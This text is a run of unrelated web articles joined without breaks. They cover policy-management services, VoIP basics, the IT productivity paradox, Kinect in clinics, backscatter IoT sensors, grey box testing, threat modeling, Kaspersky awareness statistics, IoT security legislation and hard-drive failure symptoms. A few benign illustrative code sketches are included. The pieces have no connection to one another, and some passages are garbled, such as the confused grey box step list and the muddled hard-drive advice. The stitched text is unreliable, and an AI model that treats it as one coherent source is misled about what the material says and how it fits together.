- The challenge is: how do you find the right policy management solution for your organization? This is where GRC 20/20 comes in. If you are looking for policy management solutions for various purposes, GRC 20/20 Research offers complimentary inquiries to explore your needs and identify a short list of solutions that best fit them. Simply register an inquiry on the GRC 20/20 website.
RFP Template & Support: Policy Management RFP Requirements Template
- GRC 20/20 can be engaged on policy management RFP projects to rapidly enable organizations to develop RFPs based on our policy management RFP criteria library. Simply email [email protected] and we can scope your needs for an RFP criteria project. GRC 20/20 is often engaged in more detailed RFP projects to help manage the RFP and keep solution providers honest based on our broad experience in the market.
Written Research on Policy Management
- Case Study: Claims Recovery Financial Services: Value Achieved in Policy Management
- Solution Perspective: RegEd CODE: Enabling an Integrated Compliance Lifecycle
Voice over IP (VoIP) is a technology that allows voice traffic to be transmitted over a data network, such as the public internet. Using VoIP, usually in conjunction with a broadband internet connection (cable modem or DSL), it is possible to use a wide range of equipment to make telephone calls over the net. With an adapter, a special IP phone (phone-to-phone) or software (PC-to-phone), the voice signal from your telephone or PC is converted into a digital signal (data packets) that travels over the internet and is converted back at the other end, so you can speak to anyone in the world with a regular phone number. (A minimal sketch of this packetising step appears after the links below.) When placing a VoIP call using a phone with an adapter, you'll hear a dial tone and you dial just as you always have. VoIP may also allow you to make a call directly from a computer using a conventional telephone, a USB phone or a headset with a microphone.
Learn more about VoIP:
- Read VoIP Articles and News
- Search for VoIP Providers
- Compare VoIP Providers
- Rank VoIP Providers (according to international VoIP rates)
- Review VoIP Providers (in our VoIP Directory)
- Ask questions and find answers in our VoIP Forum
- Find suitable VoIP Hardware
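As referenced above, here is a rough Python sketch of just the packetising step: reading digitised voice and sending it as small frames over UDP. It is illustrative rather than a working softphone; the destination address and WAV file are placeholders, and real VoIP stacks add codecs (e.g. G.711 or Opus), RTP headers, jitter buffers and SIP signalling.

```python
# Minimal sketch of the packetising step in a VoIP sender: read PCM audio,
# split it into ~20 ms frames, and push each frame over UDP.
import socket
import wave

DEST = ("192.0.2.10", 5004)   # placeholder address and port for illustration
FRAME_MS = 20                 # typical voice frame length

with wave.open("speech.wav", "rb") as audio:   # hypothetical recorded speech file
    frames_per_packet = int(audio.getframerate() * FRAME_MS / 1000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    seq = 0
    while True:
        chunk = audio.readframes(frames_per_packet)
        if not chunk:
            break
        # Prefix a sequence number so the receiver can detect loss or reordering.
        sock.sendto(seq.to_bytes(2, "big") + chunk, DEST)
        seq = (seq + 1) % 65536
```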
It’s easy to argue that today’s information technologies accelerate the speed at which enterprises make decisions, process information, and collaborate to solve problems. But do they provide any competitive advantages? The pace of collaboration, problem solving, innovation, and value creation has been increasing as new enabling tools emerge, resulting in a cycle in which innovation leads to new inventions. For example, the development of knowledge bases presented an innovative way to collaborate, which in turn led to inventions in many fields.(1) Some might assume that this process creates an advantage, but in reality, almost everyone else is developing these tools at the same time. New capabilities are evolving in the context of an ecosystem of competitors, all of whom are trying to do the same thing. The key is to leverage new tools and approaches faster than others in your industry, creating differentiated value for the customer.
Overcoming the Productivity Paradox
One challenge is that there’s an increasing level of overhead involved with these tools and infrastructure. While adding capability and improving the ability to collaborate and solve problems, technologies are also adding complexity and reducing productivity in some contexts. This well-known productivity paradox isn’t really a paradox at all. Since economist Robert Solow observed back in 1987 that there was a lack of evidence of productivity increases from computer technology,(2) several explanations have been presented. These include issues related to how productivity is measured, how the technology is implemented and managed, the lag between technology investment and benefits realization, and the phenomenon of differentiated advantages across competitors (the “redistribution of profits”).(2) Innovative approaches for applying new technology can have a significant impact on the enterprise or institution. If competitors can take advantage of a shift in technology use faster than you can, it puts your market share at risk. For example, a large book publisher gained a sizable share of the K-12 market after adopting component authoring.(3) The new approach helped the publisher adapt to changing curricula standards and develop textbooks that accommodated those standards, which varied by grade, subject matter, and school district. The company developed taxonomies and metadata for a repository containing more than one million content components, which an editor could use to begin the development process as standards were updated. This reduced the time to market by six months. By the time others realized there was a new process in use, the publisher had a three-year advantage in the marketplace, having already transformed its internal processes and developed competencies. So how can you exploit new technology to stay ahead of the competition? The challenge isn’t just to recognize innovative technology but also to apply it to your existing business model. In some cases, this requires breaking the business model and coming up with an entirely new way of doing business. Much of the maturity that’s required to leverage technology for a competitive advantage relates more to the people and business processes than to the complexity of the application. Organizations must transform how they do business—they can’t just use the same old approaches with new software.
Transforming the Business
Transformation requires a strong leader who has developed an achievable vision only after exploring issues and challenges at the front lines of the business and understanding how technology can create order-of-magnitude, not just incremental, improvements when solving problems. This vision is about the digital experience—regardless of whether it’s for internal or external users.
Understanding the Digital Experience
The era we live in no longer tolerates disruptions caused by someone accessing a computer in a call center to answer your question. Similarly, being transferred between departments because of siloed processes causes frustration and loss of good will. Users have higher expectations for Web experiences and internal information system capabilities. They expect intuitive access to a wide range of information sources as they go about their day-to-day tasks. Shoppers want to find products with minimal effort. They also want you to offer choices that directly support their tasks and present reviews and recommendations from their peers. The digital experience must tailor content and functionality to the user’s current need. All of this is data driven. It requires having a richer understanding of users and their needs, modeling the data to represent those users and needs, and measuring the results using multiple data streams. Whether organizations create a tailored Web experience, a personalized interface to an intranet with content adapted based on the user’s role in the organization, or a custom search experience based on the user’s task and interest, the same mechanisms apply—modeling the user, modeling the information he or she seeks, and developing mechanisms that can serve that information depending on a particular set of circumstances. Doing so means changing how information is created, structured, organized, curated, managed, and integrated across systems, processes, and department siloes. The larger the organization, the more challenging this becomes. Providing a seamless, contextually relevant digital experience requires changing deeply entrenched organizational habits. Implementing such changes entails a long-term commitment to goals consistent with the organization’s vision.
Presenting Context-Driven Data
This evolution requires bringing to the surface knowledge of the customer, which has been embedded in institutional memory, so that it can be systematically exploited through multiple touch points and channels. For example, in an engineering-focused manufacturing organization that sells to other manufacturers, the expertise that the customer wants to access is mostly in the minds of company engineers. In a small firm, you might pick up the phone or have a face-to-face meeting to capture such expertise, but as the volume of knowledge grows, technology is needed to transfer the knowledge to the customer. However, effective capture and presentation of expertise requires more than just installing Web content management software. You need a mechanism for capturing the knowledge upstream and curating it through a managed process that applies a selective filter, so you’re only presenting information as it’s needed by the customer. In a consumer context, this might require harmonizing your understanding of the customer across a customer relationship management system, a website content management system, automated marketing or email systems, and ecommerce engines.
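To illustrate the "model the user, model the information, and match the two" mechanism described above, here is a small, hypothetical Python sketch. The roles, tags, and content items are invented for the example; a real implementation would draw them from the organization's own taxonomy and profile data.

```python
# Sketch: content items carry audience metadata, and the experience layer
# filters them against the visitor's modelled attributes.
CONTENT = [
    {"title": "Quarterly revenue dashboard", "audience": {"finance", "executive"}},
    {"title": "API integration guide", "audience": {"engineering"}},
    {"title": "Onboarding checklist", "audience": {"all"}},
]

def tailor(user_profile: dict) -> list:
    """Return the titles whose audience overlaps the user's modelled roles."""
    roles = set(user_profile.get("roles", [])) | {"all"}
    return [item["title"] for item in CONTENT if item["audience"] & roles]

print(tailor({"roles": ["engineering"], "interests": ["apis"]}))
# -> ['API integration guide', 'Onboarding checklist']
```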
In a system-siloed world, different departments would be behind these systems, which would be from different software providers or a combination of custom, off-the-shelf, and home-grown tools with inconsistent architectures and different models of the customer. Each system would have a different “schema” or set of attributes and descriptors. Although some standards might be observed, each product would consider different attributes about the customer and have different data sets, interpreted differently based on the system view. Therefore, the information provided by that application would paint a different picture with different parameters about who the customer is. These different data streams must be interpreted and, oftentimes, normalized—that is, different terms describing the same concept must be translated to a preferred, common term across systems to allow for analysis.
Exploiting Big Data
With more data sources, organizations have more mechanisms to provide input to develop user attributes. You can divide and subdivide users into many different categories, depending on the context. So you might start with “women between 30 and 35 who are Yoga enthusiasts and professionals,” but then you could add “who work in the media and entertainment industry, drive foreign-brand luxury cars and own Apple computers, are interested in green products…” and so on. You can add descriptors to data that will allow more slicing and dicing and, in combination with other data, allow for new insights. These details will reveal opportunities to address unmet needs or to outperform a competitor. The very fact of discovering patterns in the data means that something of value exists—once those attributes can be aligned, the organization’s value proposition increases. Having more data sources means that the potential combinations expand exponentially. You can combine demographic profiles with Facebook and social media patterns. Mobile applications that leverage geofencing—the ability to track users’ proximity to physical points of interest—allow for unprecedented mining of user characteristics and attributes. Organizations must continue to get better at managing information as a strategic asset—and not just focusing on the obviously high-value content of sources such as ecommerce websites or knowledge bases for call centers. Before content is organized for external consumption, many internal processes require the ability to find and reuse high-value content that typically hasn’t been curated effectively. If we can reduce the amount of churn, friction, and asset duplication and make it easier for others in the enterprise to leverage the collective knowledge and expertise of coworkers, the enterprise can become more agile and efficient. The resulting improvement applies to structured as well as unstructured information. Big data initiatives compound the problem by adding more sources to the mix. As more organizations deploy complex customer-facing applications, trying to stitch together internal systems and processes and interpret more streams of data, foundational capabilities and competencies in data, information, and knowledge curation become more important. With the explosion of information and the coming Internet of Things, this problem will only become more pressing and the need more urgent.
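Here is a small, hypothetical Python sketch of the normalization step just described: raw values from siloed systems are translated to a preferred, common term so the streams can be analyzed together. The system names, field values, and synonym table are invented for illustration, not an actual schema.

```python
# Sketch: normalise customer attributes from siloed systems into one
# preferred vocabulary so the streams can be analysed together.
PREFERRED_TERMS = {
    "f": "female", "fem": "female", "female": "female",
    "lux-import": "luxury import car owner",
    "auto_luxury_import": "luxury import car owner",
    "yoga": "yoga enthusiast", "fitness/yoga": "yoga enthusiast",
}

def normalise(record: dict) -> dict:
    """Translate each raw attribute value to the preferred term where one exists."""
    return {key: PREFERRED_TERMS.get(str(value).lower(), value)
            for key, value in record.items()}

crm_row = {"gender": "F", "interest": "Fitness/Yoga"}
ecommerce_row = {"gender": "female", "vehicle": "lux-import"}

unified = [normalise(row) for row in (crm_row, ecommerce_row)]
print(unified)
# Both rows now describe the customer in the same vocabulary, so segments such as
# "female yoga enthusiasts who own a luxury import" can be built across systems.
```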
The recipe for getting ahead of the curve and leveraging technology to improve the customer experience is to begin with clear goals that support business objectives at a detailed process level—not at an abstract, theoretical level. It’s also important to get the basic housekeeping in order—consistent language and terminology, unstructured content organization, data curation at the source, and data governance processes for making decisions and allocating resources. Big data and new customer experience technologies are game changers to be sure. However, unless the lessons of the productivity paradox are applied, these changes will only serve as distractions. These lessons include
- aligning IT investments with the business strategy;
- creating a more agile structure by decentralizing functions;
- decentralizing the IT organization but retaining strong centralized standards and coordination;
- refining, streamlining, and improving processes when deploying new IT systems;
- performing a competitive analysis to benchmark organizational maturity; and
- establishing measurement and feedback loops to course correct and deploy resources appropriately.(4)
Companies that anticipate the changing needs of the rapidly changing marketplace and successfully implement new technology put themselves in a good position to gain the edge over their competitors.
1. A.B. Markman and K.L. Wood, Tools for Innovation: The Science Behind the Practical Methods That Drive New Ideas, Oxford University Press, 2009, pp. 157–159.
2. E. Brynjolfsson, “The Productivity Paradox of Information Technology: Review and Assessment,” Center for Coordination Science, MIT Sloan School of Management, 1994; http://ccs.mit.edu/papers/CCSWP130/ccswp130.html.
3. S. Earley, C. Hogue, and M. Walch, “Taxonomies, Metadata, and Publishing,” Earley & Associates, 5 Dec. 2007; https://www.earley.com/training-webinars/taxonomies-metadata-and-publishing.
4. J. Dedrick and K.L. Kraemer, “The Productivity Paradox: Is it Resolved? Is there a New One? What Does It All Mean for Managers?” Center for Research on Information Technology and Organizations, UC Irvine, 2001; http://escholarship.org/uc/item/4gs825bg.
This Article was originally published in IT Pro.
Kinect started off on Xbox 360, but it has morphed since then to adapt to the newer Xbox One as well as Microsoft's operating system. There seems to be no end to the uses to which the device can be put. However, the medical field is one of the most specialised industries around, and adoption of new technology can be slow given the rigorous requirements involved. Now doctors at the University of California at San Diego have found a way to incorporate Kinect for Windows into their job. "The project, called Lab-in-a-Box, is the brainchild of UCSD researcher Nadir Weibel and his colleagues at the San Diego Veterans Affairs (VA) Medical Center", the Kinect team explains. The device is essentially being used almost as a baby-sitter, monitoring the doctor's visit with a patient. What it's looking for is human contact, making sure that each physician is paying attention to the patient as opposed to spending too much time at the computer screen. "The Kinect sensor plays a key role in the process, as its depth camera accurately records the movements of the physician's head and body. An independent eye-tracker device detects the doctor's gaze, while a microphone picks up the doctor-patient conversation". All of this is captured and analysed alongside the doctor's computer usage, and a detailed report is produced that lets everyone know what is really transpiring in that room. It was created to help deal with today's increasingly digital world and ensure that the relationship between doctor and patient doesn't suffer. The setup is still being tested and is only used with permission from both doctor and patient. It's an interesting concept and perhaps part of the future, though no doubt some people will have privacy concerns - after all, we aren't all comfortable getting undressed as a camera watches on.
University of Washington researchers have developed a way to use backscatter techniques to send IoT sensor data over long distances using almost zero power. Researchers at the University of Washington have developed IoT devices that run on almost zero power and can transmit data across distances of up to 2.8 kilometres. The breakthrough could enable large arrays of interconnected devices, they say. The scientists presented their findings at Ubicomp 2017 last week and demonstrated how sensors could be equipped with a built-in modulation technique called a long-range backscatter system, which uses reflected radio signals to transmit data at extremely low power and low cost.
A range of deployments
In tests, the team achieved coverage throughout a 4,800-square-foot house, an office area covering 41 rooms and a one-acre vegetable farm. The technique used is called chirp spread spectrum. It spreads reflected signals across multiple frequencies, which improves receiver sensitivity and allows backscattered signals to be decoded across greater distances, even in ‘noisy’ conditions. “Until now, devices that can communicate over long distances have consumed a lot of power. The trade-off in a low-power device that consumes microwatts of power is that its communication range is short,” explained Shyam Gollakota, lead faculty and associate professor in the Paul G. Allen School of Computer Science & Engineering at University of Washington. “Now we’ve shown that we can offer both, which will be pretty game-changing for a lot of different industries and applications.”
Cost and coverage
The sensors use 1,000 times less power than existing technologies capable of transmitting data over similar distances, which could pave the way for putting connectivity into many objects. They are also very cheap, costing up to 20 cents each. This could allow a farmer to cover an entire field with sensors to work out how to plant seeds or water economically. The sensors could also be used to monitor pollution or traffic in smart cities. “People have been talking about embedding connectivity into everyday objects such as laundry detergent, paper towels and coffee cups for years, but the problem is the cost and power consumption to achieve this,” said Vamsi Talla, CTO of Jeeva Wireless, a spin-off company founded by the UW team of computer scientists and electrical engineers to commercialize the research. The research team expects to begin selling the technology within the next six months.
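For readers who want a feel for how chirp spread spectrum works, here is a small, generic Python/NumPy sketch. It is not the UW team's actual scheme or parameters, only an illustration of the general principle: sweeping each symbol across the band spreads its energy over many frequencies, so a correlating receiver can recover it from very weak signals.

```python
# Toy illustration of chirp spread spectrum: each symbol is a tone that sweeps
# ("chirps") across the whole band; data is encoded as a frequency offset.
# Bandwidth, sample rate and the 2 kHz shift are arbitrary teaching values.
import numpy as np

BW = 125e3      # swept bandwidth, Hz
FS = 1e6        # sample rate, Hz
T_SYM = 1e-3    # symbol duration, s

def up_chirp(shift_hz: float = 0.0) -> np.ndarray:
    """Complex baseband up-chirp; data can be encoded as a starting-frequency shift."""
    t = np.arange(0, T_SYM, 1 / FS)
    k = BW / T_SYM                           # sweep rate, Hz per second
    inst_freq = -BW / 2 + shift_hz + k * t   # linearly rising instantaneous frequency
    phase = 2 * np.pi * np.cumsum(inst_freq) / FS
    return np.exp(1j * phase)

reference = up_chirp()              # the receiver's known reference sweep
symbol = up_chirp(shift_hz=2e3)     # a transmitted symbol, offset by 2 kHz

dechirped = symbol * np.conj(reference)      # cancels the common sweep, leaving a pure tone
spectrum = np.abs(np.fft.fft(dechirped))
peak_bin = int(np.argmax(spectrum))
print(peak_bin * FS / len(dechirped))        # ~2000.0 Hz: the shift (the data) is recovered
```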
What is Grey Box Testing?
Grey box testing focuses on all layers of any complex software system to increase testing coverage. It enables testing of both the presentation layer and the internal coding structure, and it is mostly used in integration and penetration testing. In this blog, we will go through gray box testing in detail.
Table of contents:
- Grey Box Testing
- Why Grey Box Testing?
- The Objective of Gray Box Testing
- Process of Gray Box Testing
- What is Gray Box Penetration Testing
- Tools of Grey Box Testing
- Techniques of Gray Box Testing
- Difference between Black Box and Gray Box
- Advantages and Disadvantages of Gray Box Testing
- Examples of Gray Box Testing
Grey Box Testing:
Gray box testing is a software testing technique in which testers do not have complete product knowledge and only have limited information about internal functionality and code. They have access to detailed design documents as well as information about the requirements. This testing method is a hybrid of black box and white box testing: in black box testing the tester has no knowledge of the code and only knows what output to expect for a given input, whereas in white box testing the tester has complete knowledge of the code. Gray box testing is most helpful in evaluating web applications, performing integration testing, testing distributed environments, testing business domains, and performing security assessments. When conducting this testing, make clear distinctions between testers and developers to ensure that test results are not influenced by internal knowledge.
Want to get certified from IIT Guwahati in Cyber Security? Here’s an opportunity for you: the Intellipaat Cyber Security course.
Why Grey Box Testing?
Gray box testing is carried out for the following reasons:
- It combines the advantages of both black box and white box testing
- It combines developer and tester input and improves overall product quality
- It reduces the overhead associated with the lengthy process of testing functional and non-functional types
- It provides enough time for a developer to fix bugs
- Testing is conducted from the perspective of the user rather than the designer
The Objective of Gray Box Testing
The objective of gray box testing is to improve product quality by combining functional and non-functional testing, which saves time and shortens the lengthy process of testing the application. Another objective is to have the application tested from the perspective of the user rather than the designer, and to give the developers enough time to fix the bugs.
Want to do a Master’s in Cyber Security? Here’s an opportunity for you: the Intellipaat Cyber Security Master’s Program.
Process of Gray Box Testing:
The tester is not required to design test cases in gray box testing. Test cases are instead generated using algorithms that evaluate internal states, program behavior, and knowledge of the application architecture. The tester then runs the tests and interprets the results. When performing grey box testing, you should do the following:
- Determine and choose inputs from white and black box testing methods.
- Determine the most likely outcomes from these inputs.
- Determine critical paths for the testing phase.
- Determine sub-functions for in-depth testing.
- Determine the inputs for sub-functions.
- Determine the likely outputs of sub-functions.
- Carry out sub-function test cases.
- Evaluate and verify the results.
- Repeat steps 4–8.
- Repeat steps 7 and 8.
Grey box test cases may include GUI-related, security-related, database-related, browser-related, and operating-system-related cases, and so on.
Excited about learning more about cyber security? Enroll in our Cyber Security course in India and get yourself certified.
What is Grey Box Penetration Testing?
Ethical (white hat) testers replicate an attacker by performing reconnaissance, identifying vulnerabilities, and breaking into your systems using similar techniques. In contrast to an attacker, they stop the test before exposing sensitive data or causing harm to your environment. A gray box penetration test provides the tester with “user” knowledge of and access to a system. It is typically used when testing an insider threat or an application that supports multiple users. The insider threat is evaluated to determine the potential damage that a (non-administrator) user could cause to your environment, while application testing is used to ensure that a user of an application cannot access another user’s data or escalate privileges. A gray box penetration test is commonly used in the two scenarios listed below:
- Application Testing: In the application testing scenario, testers typically exercise an application, such as a web application or custom-built application, as an authenticated user.
- Insider Threats: In the insider threat scenario, testers are frequently given user-level access to an enterprise Windows domain. This validated, user-level access is used to validate and test user rights, permissions, and access. Users should only be given the information they need to do their job, yet many organizations do not fully comprehend or document all of the access that a “user” may have.
Want to crack cyber security interviews? Here’s an opportunity for you: Top 50 Cyber Security Interview Questions and Answers!
Tools of Grey Box Testing:
Automated testing tools are intended for testing applications for specific purposes. For example, Selenium is used to test web applications in browsers, whereas Appium is used to automate mobile application testing.
Techniques of Gray Box Testing:
Gray box testing techniques are intended to enable penetration testing of your applications. These techniques allow you to test for both insider threats (employees attempting to manipulate applications) and external users (attackers attempting to exploit vulnerabilities). Gray box testing ensures that applications function as expected for authenticated users. You can also ensure that malicious users do not have access to data or functionality that you do not want them to have. There are several techniques available when performing grey box testing. Depending on the testing phase and the application’s functionality, you may want to combine multiple techniques to ensure that all potential issues are identified. Here are some techniques of gray-box testing:
- Matrix Testing: Matrix testing is a technique for analyzing all variables in a program. The developers define technical and business risks in this technique, and a list of all application variables is provided. Each variable is then evaluated based on the risks it poses. This technique can be used to identify unused or unexploited variables.
- Regression Testing: Regression testing checks whether application changes or bug fixes have introduced errors in existing components. It can be used to ensure that changes to your application only improve the product rather than relocate faults.
Because inputs, outputs, and dependencies may have changed, you must recreate your tests when performing regression testing.
- Pattern Testing: Pattern testing is a technique for identifying patterns that lead to defects by evaluating previous defects. These evaluations should ideally highlight which details contributed to defects, how the defects were discovered, and how effective the fixes were. This information can then be used to identify and prevent similar defects in new versions of an application or new applications with similar structures.
Learn more in our Cyber Security Tutorial!
Difference between Black Box and Gray Box
| Black Box | Grey Box |
| --- | --- |
| A software testing technique in which the tester is unaware of the application’s internal structure. | A software testing technique in which the tester has only a partial understanding of the internal structure of the application under test. |
| It is referred to as closed box testing. | It is referred to as translucent testing. |
| No knowledge of the implementation is required. | Knowledge of the implementation is required, but the tester does not need to be an expert. |
| It is based on the software’s external expectations and behavior. | It is built on database and data flow diagrams. |
| It enhances some of the software’s features. | It enhances the overall quality of the software. |
Aspiring to become a certified cyber security professional? Here’s a chance for you: the Cyber Security course in Chennai!
Advantages and Disadvantages of Gray Box Testing
When deciding whether or not to use grey box testing, consider the following advantages and disadvantages. These can assist you in determining whether grey box testing is appropriate for your testing situation and how much value it can provide.
Advantages of Grey-Box Testing:
- Testing considers the user’s perspective, thereby improving product quality overall
- Clear testing objectives are established, making it easier for testers and developers to work together
- Testing methods give developers more time to fix bugs
- It has the potential to eliminate conflicts between developers and testers
- Testers are not required to be programmers
- It is less expensive than integration testing
Disadvantages of Grey-Box Testing:
- In distributed systems, it can be difficult to link defects to root causes
- Due to restricted access to the internal application structure, code path traversals are limited
- It cannot be used to test algorithms
- Designing test cases can be challenging
Examples of Grey Box Testing
- Grey box testers can analyze error codes and investigate the cause in depth if they have knowledge of and access to the error code table, which lists the cause for each error code. Assume the webpage returns an error code of “Internal server error 500,” and the cause of this error is shown in the table as a server error. Using this information, a tester can investigate the problem further and provide details to the developer rather than merely describing it to them. (A small sketch of this kind of error-code check appears at the end of this article.)
- When testing a website, if the tester clicks on a link and receives an error message, the grey box tester can make changes to the HTML code to verify the error. In this scenario, white box testing is performed by changing the code, and black box testing is performed concurrently as the tester exercises the changes at the front end.
Grey box testing is produced by combining the white box and the black box approaches, and it is very useful because it draws on both sets of techniques.
This testing method is more suitable for web-based applications, functional testing, and domain testing. The creation of test cases for grey box testing includes all aspects such as security, database, browser, GUI, and so on. This testing technique is better suited to complex scenarios than other techniques. It is built on functional specifications rather than source code or binaries. If you have any doubts or queries regarding cyber security, shoot them right away in our Cyber Security Community!
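Following the error-code example described in the section above, here is a minimal, hypothetical Python sketch of a grey box check: the page is exercised from the outside like a user would, but the tester's partial internal knowledge (a documented error-code table) is used to explain the failure. The URL, table contents, and codes are invented for illustration.

```python
# Grey-box style check: drive the application like a user (black box view), but
# use partial internal knowledge -- the documented error-code table -- to report
# the underlying cause. URL and table contents are hypothetical.
import requests

ERROR_CODE_TABLE = {  # excerpt of internal documentation a grey box tester may hold
    500: "Internal server error - unhandled exception in the order service",
    503: "Dependency outage - payment gateway unreachable",
}

def check_page(url: str) -> None:
    """Fail with the documented cause if the page returns a server-side error."""
    response = requests.get(url, timeout=10)
    if response.status_code >= 500:
        cause = ERROR_CODE_TABLE.get(response.status_code, "cause not documented")
        raise AssertionError(f"{url} returned {response.status_code}: {cause}")

check_page("https://example.test/checkout")  # placeholder endpoint
```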
What is threat modeling?
Threat modeling is an activity most of us incorporate into our daily life. For instance, a commuter might wonder what he would do if his train were delayed and he missed his flight as a result. Threat modeling is a process that helps us identify potential threats. It also allows us to analyze the risks they pose and introduce mitigation strategies. At its core, threat modeling answers a few key questions:
- Where am I most vulnerable to attack?
- What are the most relevant threats?
- What should I do to safeguard against these threats?
Threat modeling prioritizes a journey of understanding security over a fixed snapshot (such as pen testing).
Why threat modeling?
100% security doesn’t exist. Security is difficult, if not impossible, to quantify objectively, as opposed to, say, code coverage in testing. Hence, it is challenging to answer how much investment in security is enough or necessary. Threat modeling provides a list of the most essential concerns, and it can also provide an approximate cost for fixing them.
How does it work?
Threat modeling is a team exercise, including architects, engineers, security champions and testers. We organize an initial threat modeling workshop for all the stakeholders at your organization. After the initial training we will organize a number of time-boxed workshops. Together we will create a model of your system. Based on this model we will start eliciting threats, assess their risk level and look into possible mitigation strategies.
What do you get?
The result of threat modeling is a helicopter view of the security state of the practice in the context of your software system. Threat modeling provides, among other things, a list of threats, their likelihood, impact, risk, and mitigation strategy. As opposed to pen testing, which provides a largely point-in-time snapshot of your security posture, threat modeling is a first step in helping your organization introduce a culture of finding and fixing threats in a more autonomous manner. Threat modeling also focuses on uncovering design-level errors rather than producing the list of security bugs a pen test delivers.
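As an illustration of the kind of output such workshops produce, here is a small, hypothetical Python sketch of a threat register: each elicited threat gets a likelihood and impact estimate, risk is their product, and the highest-risk items are reviewed first. The threats, scores, and mitigations are invented for the example and do not describe any particular system.

```python
# Minimal sketch of a threat register: risk = likelihood x impact,
# reviewed highest-risk first. All entries are illustrative.
from dataclasses import dataclass

@dataclass
class Threat:
    description: str
    likelihood: int          # 1 (rare) .. 5 (almost certain)
    impact: int              # 1 (negligible) .. 5 (severe)
    mitigation: str = "TBD"

    @property
    def risk(self) -> int:
        return self.likelihood * self.impact

register = [
    Threat("Stolen session token replayed against the API", 4, 4,
           "Short-lived tokens bound to the client"),
    Threat("Admin console reachable from the internet", 2, 5,
           "Restrict to VPN and require MFA"),
    Threat("Verbose error pages leak stack traces", 3, 2),
]

for threat in sorted(register, key=lambda t: t.risk, reverse=True):
    print(f"risk={threat.risk:>2}  {threat.description} -> {threat.mitigation}")
```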
Email and passwords: the most common knowledge gaps in cybersecurity are revealed Statistics from students of a corporate security awareness platform show that people most frequently make mistakes answering questions related to email and password usage. Tasks around these topics are in the top 5 most commonly failed by users. The compliance of staff members remains one of the biggest concerns when it comes to cybersecurity: a recent survey of IT workers shows that inappropriate usage of IT resources by employees is the most common incident they face in their work. At the same time, 90% of employees tend to overestimate their knowledge of cybersecurity basics. To identify the most vulnerable areas in corporate cybersecurity awareness, Kaspersky analyzed the answers given by people while going through the online security awareness quiz. According to the internal Kaspersky Automated Security Awareness Platform data, the most difficult question - with 83% of wrong answers - is asking what card details shouldn’t be emailed. The remaining four of the five most frequent wrongly answered questions consist of tasks regarding email interaction and password usage: - Check all signs showing that someone has accessed your account. (73% answered incorrectly); - You buy an app from the Google Play store and the system suddenly asks you to enter your Gmail email password. What should you do? (70% answered incorrectly); - Fraudsters have hacked your friend's email. He will not restore access to the mailbox, claiming that he has not used it for many years and does not store any important information there. Explain why access still needs to be restored. (70% answered incorrectly); - You are on a business trip, and your Internet access is unstable. While you are in another city, a colleague urgently needs a document that can only be accessed from your work account. This colleague asks you for a password from your computer. What should you do? (51% answered incorrectly). Users show more vigilance when it comes to confidential corporate data. 99% of people correctly answered the questions devoted to sensitive information leakage or if a person with access to confidential documents leaves the company. “It is understandable that people tend to be more careful with confidential information. This kind of data, by definition, implies that an employee must be more attentive while working with it. At the same time, sending information via email and entering passwords are part of our everyday routine and, at first sight, don’t pose any special risks. However, this negligence can be costly for a company, as criminals still employ old methods of cybercrime, such as the brute force of phishing. That is why it is important that corporate cybersecurity training uncovers all possible weaknesses and vulnerabilities even in most common everyday scenarios.” - comments Denis Barinov, Head of Kaspersky Academy. To help companies refresh their employees’ cybersecurity knowledge around the essential parts of their work and personal interactions, Kaspersky has introduced a free online course on social media. As cybercriminals relish the opportunity to use social networks to obtain the information they need to carry out attacks against ordinary users and their employers, the course will teach staff how to avoid becoming a victim of social media scams. 
To benefit from training on safeguarding your online life, including which information you should avoid sharing via the Internet and how to avoid social engineering, please visit our website. The statistics are based on the results of 12,500 Kaspersky Security Awareness Platform users trained between January and April 2022.
New legislation could be on the way to secure the devices we use in our everyday lives. From our smart phones to our garage door openers, the IoT space has revolutionized the way we organize and live out our daily routine. In recent months, the security of these devices has been scrutinized as vulnerabilities have been uncovered and, even worse, exploited. Republicans Cory Gardner and Steve Daines, along with Democrats Mark Warner and Ron Wyden, are working to introduce a new bill intended to prevent such attacks: the Internet of Things Cybersecurity Improvement Act of 2017. The bill outlines “minimal cybersecurity operational standards for Internet-connected devices purchased by Federal agencies, and for other purposes.” The legislation is intended to hold providers of internet-connected devices accountable for potential threats to the security of those products. These companies would need to provide patches, fixes, and other means to safeguard against attacks as they are uncovered. The bill lays out several security focuses, including:
- IoT companies that offer products purchased by the federal government must ensure their devices are patchable, rely on industry standard protocols, do not use hard-coded passwords, and do not contain any known security vulnerabilities
- Requirements for alternative network-level security requirements for devices with limited data processing and software functionality, led by the Office of Management and Budget (OMB)
- The development of new guidelines regarding cybersecurity coordinated vulnerability disclosure policies to be required of contractors providing connected devices to the U.S. Government, led by the Department of Homeland Security’s National Protection and Programs Directorate
- An executive agency mandate to inventory all Internet-connected devices in use by the agency
This concept may be new to those within the growing IoT space, but it is already the status quo in many federal agencies and heavily regulated industries around the globe. Security standards and procedures exist today to hold companies accountable for the technology they produce, and through an accredited security certification testing process, products are validated against potential threats to systems and infrastructure. The new movement to secure the IoT space has already taken lessons learned from other industries in order to quickly and effectively introduce protocols that protect user data and security. The bill specifically “requires the contractor providing the Internet-connected device to provide written certification that the devices, does not contain, at the time of submitting the proposal, any hardware, software, or firmware component with any known security vulnerabilities or defects listed in the National Vulnerability Database of NIST.” NIST also oversees other security certifications, such as FIPS 140-2: products sold into the U.S. federal government are required to complete FIPS 140-2 validation if they use cryptography in security systems that process sensitive but unclassified information. If you would like more information regarding IoT security, or how existing security certifications such as FIPS 140-2, Common Criteria, or the DoD’s APL can be applied, then contact Corsec today to get started! Subscribe to Corsec emails!
The hard drive is a key component of a computer system; if the hard disk is in good condition, the system as a whole tends to stay healthy. But, like any kind of health, that condition can change and show trouble at any time, so it helps to know what to do when it does. A computer can develop many kinds of trouble, and not all of them are caused by hardware, so the first step is to understand which problems actually point to failing hardware. Below is a short overview of the common symptoms that indicate a damaged or failing hard drive or RAID array.
Read/write errors. Any reading or writing depends on a storage device, and for a computer the key component behind those operations is the hard disk. If the system repeatedly shows errors while reading or writing data, the hard disk is a likely cause. A full restart is worth trying first, since many such problems clear up on their own; if the errors persist, contact the manufacturer or a technician.
Slow response. Sometimes the display, the mouse pointer, or the response to a keystroke lags by a minute or more. This usually indicates that the hard disk is busy with other work, and its response to external commands becomes much slower until that work finishes. In that case it is better to let the disk complete its earlier work and retry the operation a little later.
Delayed response with loud noise. A related symptom is when the system responds late to a command and the drive becomes noticeably loud. Again, this indicates that the hard disk is busy, so give it time to finish its current work before issuing further commands.
